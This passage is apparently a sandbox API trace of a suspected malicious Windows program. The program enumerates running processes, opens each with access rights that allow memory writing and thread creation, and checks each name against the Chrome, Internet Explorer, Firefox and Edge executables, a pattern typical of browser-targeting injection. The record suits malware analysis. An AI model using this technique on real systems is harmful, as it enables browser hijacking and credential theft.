	[0200.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0200.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1ddc
	[0200.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.975] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0200.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.975] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.975] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0200.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.976] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1de0
	[0200.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.977] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.977] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.977] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.978] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.978] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0200.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1de4
	[0200.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.979] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0200.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.979] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.979] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0200.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.980] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.980] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0200.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1de8
	[0200.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.981] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0200.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.981] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.981] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0200.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.982] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0200.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1dec
	[0200.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.983] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0200.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.983] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.983] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0200.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.984] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.984] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0200.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1df0
	[0200.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.985] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0200.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.985] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.985] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0200.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.985] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1df4
	[0200.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.986] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.987] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.987] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.987] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1df8
	[0200.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.988] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.988] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.989] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.989] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.989] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1dfc
	[0200.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.990] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.990] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.991] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.992] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.992] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1e00
	[0200.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.993] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.993] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.993] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.993] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.994] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1e04
	[0200.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.995] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.995] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.995] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.995] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.996] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1e08
	[0200.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.996] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.997] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.997] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.997] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.998] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1e0c
	[0200.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.998] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.999] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.999] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.999] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0201.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1e10
	[0201.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.000] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0201.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.001] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.001] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0201.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.001] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1e14
	[0201.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.002] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.002] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.003] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.003] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.003] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0201.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e18
	[0201.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.004] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.004] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.005] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.005] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.005] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1e1c
	[0201.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.006] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.006] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.007] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.007] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.007] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1e20
	[0201.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.008] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.009] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.009] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.009] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.009] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0201.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1e24
	[0201.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.010] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0201.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.010] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.011] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0201.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.011] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.011] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0201.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1e28
	[0201.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.012] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0201.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.012] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.013] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0201.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.013] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0201.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e2c
	[0201.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.014] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.014] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.014] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.015] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.015] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0201.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1e30
	[0201.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.016] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0201.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.016] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.016] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0201.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.017] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0201.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0201.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0201.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1e34
	[0201.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.018] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0201.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.019] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.019] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0201.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.020] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.020] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0201.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1e38
	[0201.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.021] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0201.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.021] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.022] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0201.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.022] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.022] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0201.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1e3c
	[0201.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.023] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
